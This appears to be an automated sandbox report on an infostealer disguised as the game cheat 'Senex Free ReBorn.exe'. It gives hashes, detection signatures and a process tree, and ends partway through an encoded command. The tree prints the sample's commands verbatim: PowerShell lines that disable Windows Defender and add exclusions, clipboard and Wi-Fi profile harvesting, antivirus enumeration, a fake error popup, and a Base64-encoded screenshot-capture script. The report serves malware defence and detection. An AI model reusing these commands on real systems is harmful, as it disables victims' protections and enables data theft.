Resubmissions
20-01-2025 23:43
250120-3qtyvavqdx 1020-01-2025 23:27
250120-3fxa8avlgt 1020-01-2025 23:26
250120-3ethyavlaj 10Analysis
-
max time kernel
443s -
max time network
532s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
20-01-2025 23:43
Behavioral task
behavioral1
Sample
Senex Free ReBorn.exe
Resource
win11-20241007-en
General
-
Target
Senex Free ReBorn.exe
-
Size
6.9MB
-
MD5
03559a96ddc80dfc0fd3a933fff9f884
-
SHA1
b630501a95be2e1027a0839a65625eca8eefb929
-
SHA256
43317a28af628e970450d3c95fbaa991b37a1c5ae73e0857d6187040a5c3c971
-
SHA512
35ebc222a2ed9883698093e88123ec3a46734ddb1640c1588dbce7953b382e41d183c6b9d24b44de915df6f5f406f69a31bcf73fa347311d50b5e3501713d4f9
-
SSDEEP
98304:WEDjWM8JEE1F3iDamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRiYRJJcGhEIJ:WE0NveNTfm/pf+xk4dWRimrbW3jmyE
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 908 powershell.exe 1680 powershell.exe 3416 powershell.exe 964 powershell.exe 1816 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3252 cmd.exe 4992 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 896 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 3004 Senex Free ReBorn.exe 3004 Senex Free ReBorn.exe 3004 Senex Free ReBorn.exe 3004 Senex Free ReBorn.exe 3004 Senex Free ReBorn.exe 3004 Senex Free ReBorn.exe 3004 Senex Free ReBorn.exe 3004 Senex Free ReBorn.exe 3004 Senex Free ReBorn.exe 3004 Senex Free ReBorn.exe 3004 Senex Free ReBorn.exe 3004 Senex Free ReBorn.exe 3004 Senex Free ReBorn.exe 3004 Senex Free ReBorn.exe 3004 Senex Free ReBorn.exe 3004 Senex Free ReBorn.exe 3004 Senex Free ReBorn.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 4880 tasklist.exe 2084 tasklist.exe 3132 tasklist.exe 2340 tasklist.exe -
resource yara_rule behavioral1/files/0x001900000002aaf1-21.dat upx behavioral1/memory/3004-25-0x00007FFBF5DB0000-0x00007FFBF6398000-memory.dmp upx behavioral1/files/0x001c00000002aade-27.dat upx behavioral1/files/0x001900000002aaec-34.dat upx behavioral1/files/0x001900000002aae0-43.dat upx behavioral1/files/0x001900000002aae3-44.dat upx behavioral1/files/0x001900000002aadf-42.dat upx behavioral1/files/0x001900000002aae9-48.dat upx behavioral1/files/0x001900000002aae6-47.dat upx behavioral1/files/0x001900000002aae5-46.dat upx behavioral1/files/0x001c00000002aae4-45.dat upx behavioral1/files/0x001a00000002aadd-41.dat upx behavioral1/files/0x001900000002aaf8-40.dat upx behavioral1/files/0x001900000002aaf7-39.dat upx behavioral1/files/0x001c00000002aaf6-38.dat upx behavioral1/files/0x001c00000002aaf0-35.dat upx behavioral1/memory/3004-32-0x00007FFC10F80000-0x00007FFC10F8F000-memory.dmp upx behavioral1/files/0x001900000002aaef-31.dat upx behavioral1/memory/3004-29-0x00007FFC0BCB0000-0x00007FFC0BCD4000-memory.dmp upx behavioral1/memory/3004-54-0x00007FFC0BC80000-0x00007FFC0BCAD000-memory.dmp upx behavioral1/memory/3004-56-0x00007FFC0CDE0000-0x00007FFC0CDF9000-memory.dmp upx behavioral1/memory/3004-58-0x00007FFC0A770000-0x00007FFC0A793000-memory.dmp upx behavioral1/memory/3004-60-0x00007FFC06D80000-0x00007FFC06EF3000-memory.dmp upx behavioral1/memory/3004-62-0x00007FFC0CB40000-0x00007FFC0CB59000-memory.dmp upx behavioral1/memory/3004-64-0x00007FFC10800000-0x00007FFC1080D000-memory.dmp upx behavioral1/memory/3004-66-0x00007FFC0A6A0000-0x00007FFC0A6CE000-memory.dmp upx behavioral1/memory/3004-74-0x00007FFC0BCB0000-0x00007FFC0BCD4000-memory.dmp upx behavioral1/memory/3004-73-0x00007FFC026D0000-0x00007FFC02A45000-memory.dmp upx behavioral1/memory/3004-71-0x00007FFC02A50000-0x00007FFC02B08000-memory.dmp upx behavioral1/memory/3004-70-0x00007FFBF5DB0000-0x00007FFBF6398000-memory.dmp upx behavioral1/memory/3004-76-0x00007FFC0A750000-0x00007FFC0A764000-memory.dmp upx behavioral1/memory/3004-79-0x00007FFC0BA30000-0x00007FFC0BA3D000-memory.dmp upx behavioral1/memory/3004-78-0x00007FFC0BC80000-0x00007FFC0BCAD000-memory.dmp upx behavioral1/memory/3004-81-0x00007FFC025B0000-0x00007FFC026CC000-memory.dmp upx behavioral1/memory/3004-82-0x00007FFC0A770000-0x00007FFC0A793000-memory.dmp upx behavioral1/memory/3004-107-0x00007FFC06D80000-0x00007FFC06EF3000-memory.dmp upx behavioral1/memory/3004-119-0x00007FFC0CB40000-0x00007FFC0CB59000-memory.dmp upx behavioral1/memory/3004-186-0x00007FFC10800000-0x00007FFC1080D000-memory.dmp upx behavioral1/memory/3004-250-0x00007FFC0A6A0000-0x00007FFC0A6CE000-memory.dmp upx behavioral1/memory/3004-252-0x00007FFC02A50000-0x00007FFC02B08000-memory.dmp upx behavioral1/memory/3004-269-0x00007FFC026D0000-0x00007FFC02A45000-memory.dmp upx behavioral1/memory/3004-272-0x00007FFC0A750000-0x00007FFC0A764000-memory.dmp upx behavioral1/memory/3004-291-0x00007FFBF5DB0000-0x00007FFBF6398000-memory.dmp upx behavioral1/memory/3004-297-0x00007FFC06D80000-0x00007FFC06EF3000-memory.dmp upx behavioral1/memory/3004-292-0x00007FFC0BCB0000-0x00007FFC0BCD4000-memory.dmp upx behavioral1/memory/3004-321-0x00007FFC026D0000-0x00007FFC02A45000-memory.dmp upx behavioral1/memory/3004-326-0x00007FFC0A770000-0x00007FFC0A793000-memory.dmp upx behavioral1/memory/3004-334-0x00007FFC025B0000-0x00007FFC026CC000-memory.dmp upx behavioral1/memory/3004-333-0x00007FFC0BA30000-0x00007FFC0BA3D000-memory.dmp upx behavioral1/memory/3004-332-0x00007FFC0A750000-0x00007FFC0A764000-memory.dmp upx behavioral1/memory/3004-331-0x00007FFC02A50000-0x00007FFC02B08000-memory.dmp upx behavioral1/memory/3004-330-0x00007FFC0A6A0000-0x00007FFC0A6CE000-memory.dmp upx behavioral1/memory/3004-329-0x00007FFC10800000-0x00007FFC1080D000-memory.dmp upx behavioral1/memory/3004-328-0x00007FFC0CB40000-0x00007FFC0CB59000-memory.dmp upx behavioral1/memory/3004-327-0x00007FFC06D80000-0x00007FFC06EF3000-memory.dmp upx behavioral1/memory/3004-325-0x00007FFC0CDE0000-0x00007FFC0CDF9000-memory.dmp upx behavioral1/memory/3004-324-0x00007FFC0BC80000-0x00007FFC0BCAD000-memory.dmp upx behavioral1/memory/3004-323-0x00007FFC10F80000-0x00007FFC10F8F000-memory.dmp upx behavioral1/memory/3004-322-0x00007FFC0BCB0000-0x00007FFC0BCD4000-memory.dmp upx behavioral1/memory/3004-306-0x00007FFBF5DB0000-0x00007FFBF6398000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 1068 cmd.exe 712 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1036 WMIC.exe 2496 WMIC.exe 1956 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4556 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 908 powershell.exe 1816 powershell.exe 1816 powershell.exe 908 powershell.exe 1680 powershell.exe 1680 powershell.exe 4992 powershell.exe 4992 powershell.exe 4992 powershell.exe 680 powershell.exe 680 powershell.exe 680 powershell.exe 3416 powershell.exe 3416 powershell.exe 3272 powershell.exe 3272 powershell.exe 964 powershell.exe 964 powershell.exe 3132 powershell.exe 3132 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 908 powershell.exe Token: SeDebugPrivilege 2340 tasklist.exe Token: SeDebugPrivilege 1816 powershell.exe Token: SeIncreaseQuotaPrivilege 1932 WMIC.exe Token: SeSecurityPrivilege 1932 WMIC.exe Token: SeTakeOwnershipPrivilege 1932 WMIC.exe Token: SeLoadDriverPrivilege 1932 WMIC.exe Token: SeSystemProfilePrivilege 1932 WMIC.exe Token: SeSystemtimePrivilege 1932 WMIC.exe Token: SeProfSingleProcessPrivilege 1932 WMIC.exe Token: SeIncBasePriorityPrivilege 1932 WMIC.exe Token: SeCreatePagefilePrivilege 1932 WMIC.exe Token: SeBackupPrivilege 1932 WMIC.exe Token: SeRestorePrivilege 1932 WMIC.exe Token: SeShutdownPrivilege 1932 WMIC.exe Token: SeDebugPrivilege 1932 WMIC.exe Token: SeSystemEnvironmentPrivilege 1932 WMIC.exe Token: SeRemoteShutdownPrivilege 1932 WMIC.exe Token: SeUndockPrivilege 1932 WMIC.exe Token: SeManageVolumePrivilege 1932 WMIC.exe Token: 33 1932 WMIC.exe Token: 34 1932 WMIC.exe Token: 35 1932 WMIC.exe Token: 36 1932 WMIC.exe Token: SeIncreaseQuotaPrivilege 1932 WMIC.exe Token: SeSecurityPrivilege 1932 WMIC.exe Token: SeTakeOwnershipPrivilege 1932 WMIC.exe Token: SeLoadDriverPrivilege 1932 WMIC.exe Token: SeSystemProfilePrivilege 1932 WMIC.exe Token: SeSystemtimePrivilege 1932 WMIC.exe Token: SeProfSingleProcessPrivilege 1932 WMIC.exe Token: SeIncBasePriorityPrivilege 1932 WMIC.exe Token: SeCreatePagefilePrivilege 1932 WMIC.exe Token: SeBackupPrivilege 1932 WMIC.exe Token: SeRestorePrivilege 1932 WMIC.exe Token: SeShutdownPrivilege 1932 WMIC.exe Token: SeDebugPrivilege 1932 WMIC.exe Token: SeSystemEnvironmentPrivilege 1932 WMIC.exe Token: SeRemoteShutdownPrivilege 1932 WMIC.exe Token: SeUndockPrivilege 1932 WMIC.exe Token: SeManageVolumePrivilege 1932 WMIC.exe Token: 33 1932 WMIC.exe Token: 34 1932 WMIC.exe Token: 35 1932 WMIC.exe Token: 36 1932 WMIC.exe Token: SeIncreaseQuotaPrivilege 1036 WMIC.exe Token: SeSecurityPrivilege 1036 WMIC.exe Token: SeTakeOwnershipPrivilege 1036 WMIC.exe Token: SeLoadDriverPrivilege 1036 WMIC.exe Token: SeSystemProfilePrivilege 1036 WMIC.exe Token: SeSystemtimePrivilege 1036 WMIC.exe Token: SeProfSingleProcessPrivilege 1036 WMIC.exe Token: SeIncBasePriorityPrivilege 1036 WMIC.exe Token: SeCreatePagefilePrivilege 1036 WMIC.exe Token: SeBackupPrivilege 1036 WMIC.exe Token: SeRestorePrivilege 1036 WMIC.exe Token: SeShutdownPrivilege 1036 WMIC.exe Token: SeDebugPrivilege 1036 WMIC.exe Token: SeSystemEnvironmentPrivilege 1036 WMIC.exe Token: SeRemoteShutdownPrivilege 1036 WMIC.exe Token: SeUndockPrivilege 1036 WMIC.exe Token: SeManageVolumePrivilege 1036 WMIC.exe Token: 33 1036 WMIC.exe Token: 34 1036 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4944 wrote to memory of 3004 4944 Senex Free ReBorn.exe 79 PID 4944 wrote to memory of 3004 4944 Senex Free ReBorn.exe 79 PID 3004 wrote to memory of 1164 3004 Senex Free ReBorn.exe 80 PID 3004 wrote to memory of 1164 3004 Senex Free ReBorn.exe 80 PID 3004 wrote to memory of 4720 3004 Senex Free ReBorn.exe 81 PID 3004 wrote to memory of 4720 3004 Senex Free ReBorn.exe 81 PID 3004 wrote to memory of 3156 3004 Senex Free ReBorn.exe 82 PID 3004 wrote to memory of 3156 3004 Senex Free ReBorn.exe 82 PID 3004 wrote to memory of 1684 3004 Senex Free ReBorn.exe 86 PID 3004 wrote to memory of 1684 3004 Senex Free ReBorn.exe 86 PID 1164 wrote to memory of 908 1164 cmd.exe 88 PID 1164 wrote to memory of 908 1164 cmd.exe 88 PID 3004 wrote to memory of 2108 3004 Senex Free ReBorn.exe 89 PID 3004 wrote to memory of 2108 3004 Senex Free ReBorn.exe 89 PID 1684 wrote to memory of 2340 1684 cmd.exe 91 PID 1684 wrote to memory of 2340 1684 cmd.exe 91 PID 4720 wrote to memory of 1816 4720 cmd.exe 92 PID 4720 wrote to memory of 1816 4720 cmd.exe 92 PID 3156 wrote to memory of 2688 3156 cmd.exe 93 PID 3156 wrote to memory of 2688 3156 cmd.exe 93 PID 2108 wrote to memory of 1932 2108 cmd.exe 94 PID 2108 wrote to memory of 1932 2108 cmd.exe 94 PID 3004 wrote to memory of 2852 3004 Senex Free ReBorn.exe 96 PID 3004 wrote to memory of 2852 3004 Senex Free ReBorn.exe 96 PID 2852 wrote to memory of 2740 2852 cmd.exe 98 PID 2852 wrote to memory of 2740 2852 cmd.exe 98 PID 3004 wrote to memory of 5056 3004 Senex Free ReBorn.exe 99 PID 3004 wrote to memory of 5056 3004 Senex Free ReBorn.exe 99 PID 5056 wrote to memory of 3296 5056 cmd.exe 101 PID 5056 wrote to memory of 3296 5056 cmd.exe 101 PID 3004 wrote to memory of 2160 3004 Senex Free ReBorn.exe 102 PID 3004 wrote to memory of 2160 3004 Senex Free ReBorn.exe 102 PID 2160 wrote to memory of 1036 2160 cmd.exe 104 PID 2160 wrote to memory of 1036 2160 cmd.exe 104 PID 3004 wrote to memory of 888 3004 Senex Free ReBorn.exe 105 PID 3004 wrote to memory of 888 3004 Senex Free ReBorn.exe 105 PID 888 wrote to memory of 2496 888 cmd.exe 146 PID 888 wrote to memory of 2496 888 cmd.exe 146 PID 3004 wrote to memory of 328 3004 Senex Free ReBorn.exe 108 PID 3004 wrote to memory of 328 3004 Senex Free ReBorn.exe 108 PID 328 wrote to memory of 1680 328 cmd.exe 110 PID 328 wrote to memory of 1680 328 cmd.exe 110 PID 3004 wrote to memory of 5040 3004 Senex Free ReBorn.exe 111 PID 3004 wrote to memory of 5040 3004 Senex Free ReBorn.exe 111 PID 3004 wrote to memory of 2788 3004 Senex Free ReBorn.exe 112 PID 3004 wrote to memory of 2788 3004 Senex Free ReBorn.exe 112 PID 3004 wrote to memory of 2952 3004 Senex Free ReBorn.exe 115 PID 3004 wrote to memory of 2952 3004 Senex Free ReBorn.exe 115 PID 2952 wrote to memory of 2040 2952 cmd.exe 117 PID 2952 wrote to memory of 2040 2952 cmd.exe 117 PID 3004 wrote to memory of 3252 3004 Senex Free ReBorn.exe 118 PID 3004 wrote to memory of 3252 3004 Senex Free ReBorn.exe 118 PID 3004 wrote to memory of 4724 3004 Senex Free ReBorn.exe 119 PID 3004 wrote to memory of 4724 3004 Senex Free ReBorn.exe 119 PID 5040 wrote to memory of 2084 5040 cmd.exe 120 PID 5040 wrote to memory of 2084 5040 cmd.exe 120 PID 2788 wrote to memory of 4880 2788 cmd.exe 121 PID 2788 wrote to memory of 4880 2788 cmd.exe 121 PID 3004 wrote to memory of 4588 3004 Senex Free ReBorn.exe 122 PID 3004 wrote to memory of 4588 3004 Senex Free ReBorn.exe 122 PID 3004 wrote to memory of 1068 3004 Senex Free ReBorn.exe 124 PID 3004 wrote to memory of 1068 3004 Senex Free ReBorn.exe 124 PID 4724 wrote to memory of 3132 4724 cmd.exe 128 PID 4724 wrote to memory of 3132 4724 cmd.exe 128
Processes
-
C:\Users\Admin\AppData\Local\Temp\Senex Free ReBorn.exe"C:\Users\Admin\AppData\Local\Temp\Senex Free ReBorn.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Users\Admin\AppData\Local\Temp\Senex Free ReBorn.exe"C:\Users\Admin\AppData\Local\Temp\Senex Free ReBorn.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Senex Free ReBorn.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Senex Free ReBorn.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Try to re-open the cheat', 0, 'Error', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:3156 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Try to re-open the cheat', 0, 'Error', 0+16);close()"4⤵PID:2688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:2740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:3296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:1036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:2496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:2040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:3252 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:4992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3132
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4588
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1068 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:924
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG